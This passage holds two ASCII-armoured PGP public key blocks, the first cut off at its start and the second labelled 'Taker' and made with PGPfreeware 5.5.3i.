esqVDNmWn6vQClCbAkbTCD1mpF1Bn5x8vYlLIhkmuquiXsNV6TILOwACAgf/VzmL
DI3Y57ouYoeTyiXCgfozGR44+NjRoDdPK1YUX0Rht8nNlt+fhh7fZWJi/j0R5Gfw
qp1XVCJQPXYlDfDcDbzE1d//ACz5qjs+NbOZ2c6+qM4jPt4vC3QkI+MATui30wT3
F9s7ZJOqgLZFtN71WL//cBl0BwmBqlIx6+gUlDu3mh/awgQBjHepeCqnU6loA/4q
p1vTFEM7AyVSDwvpunzKJno7Lwd4/Frqxq9a8PLW33fV0kF609uNR0R+KkxW7rqV
j/S0hnRHEX3WqCsQbWATdGEhrrpaDg5ntiSzaji0j2t9y/LKU9OwvJ4k+Tnt6vix
4wd09rLJL+S2G7DcyIkARgQYEQIABgUCN1xscgAKCRBAQ+vp1CYzZNvUAKDIevmC
8589h6ujGTj7IljPAxDO0QCgtmxPobpbnzDbR+AkhmqJmhnaGq0=
=AUmh
-----END PGP PUBLIC KEY BLOCK-----

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Taker

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use 

mQGiBDb8SsoRBADR+XW+WOBBrd1y5bsd/o0KlM4cRlGWlqzfVfQq4UONrV/uErCq
Q0nHJnG/2g2uORJSwgirMYIJWXWXKtuPo4mQqxf1NTebONio1ZoZnlcek9rjmkOC
l22bu3J53VnjYnLqrfCQi4tqLEdvghbe10xE/CioEw6jjMclS+5IW7JfjwCg/z5F
iCgxm5Z9GH8xZCslNO7jaqkD+wS+W7vaMMZvrTGsZrelrK8q5ebroUmcTq8j6EL7
xabuU8G+Nm88yEQYwjbLtbF7oOcr+JkMj4GtT0S9pavzInH+29I9iMAUXnlhk9gC
s6NHV9+R6abbbacfV5WQ+14ZpWRbf4idtXa9xqhvZ+UokekE6E0/Y+3NKmPEWtHB
zROLA/9D+vxVa0hcWuzlCid+iCyWXLaQJ3qhJzkoUOS3m7k/qEKIsyS4Era8Mxk3
d+GgiO65gJYjB2EW87T8vCJ7jicELWx0winfzc/hoya/e7yBR6oZlz9tuGxy5or7
cOJQE2XG/MbMGkEnSOEKnv/hg/gog5jHuguVH/WnWB4mtVnvJbQfVGhlIFRBa0VS
IDx1X3Rha2VyQGJpZ2Zvb3QuY29tPokASwQQEQIACwUCNvxKygQLAwIBAAoJEAFU
9r8dOXuwGo0AniGYVsvsFTpJqb+AUgH1oNCIXzG3AKDWGPWnKlu5GkY8weHfbSza
PPhkDbkCDQQ2/ErLEAgA9kJXtwh/CBdyorrWqULzBej5UxE5T7bxbrlLOCDaAadW
oxTpj0BV89AHxstDqZSt90xkhkn4DIO9ZekX1KHTUPj1WV/cdlJPPT2N286Z4VeS
Wc39uK50T8X8dryDxUcwYc58yWb/Ffm7/ZFexwGq01uejaClcjrUGvC/RgBYK+X0
iP1YTknbzSC0neSRBzZrM2w4DUUdD3yIsxx8Wy2O9vPJI8BD8KVbGI2Ou1WMuF04
0zT9fBdXQ6MdGGzeMyEstSr/POGxKUAYEY18hKcKctaGxAMZyAcpesqVDNmWn6vQ
ClCbAkbTCD1mpF1Bn5x8vYlLIhkmuquiXsNV6TILOwACAgf/ZwDBuF6kendVHXsK
VeWcKWqVwqv/xc50ls18Z5DoF52gFUJfcKd3uJD6vymKlMQ1uqWu0YftnGvlAUEZ
syzRQ5N9wHwTATv9gwVvf1AhEeBXROw/K+wvQxO37WBRWo5sHAF3SNHfRMussIO+
qxYaI3zg5lBYXC0JRa1J4c8Wd1rc5KvqOsh5fk5zXxABCqF3pS8VZa4hZ1srKANr
QmmRJ8KyiTsC68nsqGfCg44Ck5Z1ghwLW357JtNZEcVxZxNvqLwtq7qHXt7JQEf6
X23V9JstFG8YJeAYFU46I1oVELNhxb3DjEJ0WTiCYiflMCCCxpMDujddPkaEdU/F
8f2OnIkARgQYEQIABgUCNvxKywAKCRABVPa/HTl7sAlWAJsGGCCzyVI0H1dIsv+i
Narq7kF2tgCfR9TUZy1LASl+ITnVt6zj3xhlRyg=
=Mu0N
-----END PGP PUBLIC KEY BLOCK-----

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~